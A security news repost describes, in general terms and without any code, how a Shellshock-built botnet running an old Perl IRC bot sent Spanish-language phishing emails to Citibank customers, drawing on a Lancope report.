HackDig : Dig high-quality web security articles for hackers

As expected, Shellshock is being used for phishing attacks

2014-10-17 16:35

Via Lancope, a botnet built by exploiting the Shellshock vulnerability is being used for phishing attacks:

"Phishing appeared to be the name of the game for these particular attackers, as it made up most of the malicious activity that we observed in the botnet. . . . The attackers commanded all of the infected hosts to reach out to a separate storage server containing PHP code used to build and send emails, as well as over 10 million email addresses.

The bots reported over 100,000 phishing emails sent. The emails attempted to phish Spanish-speaking Citibank users. The message, in Spanish, tells potential victims that their Citibank card has been deactivated for security reasons and can be reactivated at a link that they supply."

In the case observed by Lancope the cybercriminals deployed code to compromise a vulnerable server and then commanded the server to download mailer scripts used to deploy the phishing emails. Figure 1 shows the script used to compromise the server. The mailer script was v0.5 of perlb0t, a.k.a. w0rmb0t or "LinuxNet perlbot" (see Figure 2). The bot, which was seen in attacks dating back to 2006, was written using Portuguese for variable names and some literal strings like error messages. It contains a port scanner, simple command shell, and flooder (DDoS) subroutines, and it uses IRC for C2.

shellshock-exploit-1Figure 1. Code deployed to compromise vulnerable systems. 

perlbot_codeFigure 2. Perl code from the bot used to obtain email software and deploy phishing emails.

It's also interesting that the report mentions the botnet contains VoiP systems compromised via Shellshock, which isn't surprising considering they likely weren't at the top of the list of systems to patch for most organizations. That being said, the phone systems used in vishing and SMiShing attacks are often compromised VoiP servers. 

More information on Shellshock and vishing:


Source: skcatta-gnihsihp-rof-desu-gnieb-si-kcohsllehs/moc.sbalhsihp.golb

Read:3650 | Comments:0 | Tags:Phishing Vishing Shellshock

“As expected, Shellshock is being used for phishing attacks”0 Comments

Submit A Comment



Blog :

Verification Code:


Tag Cloud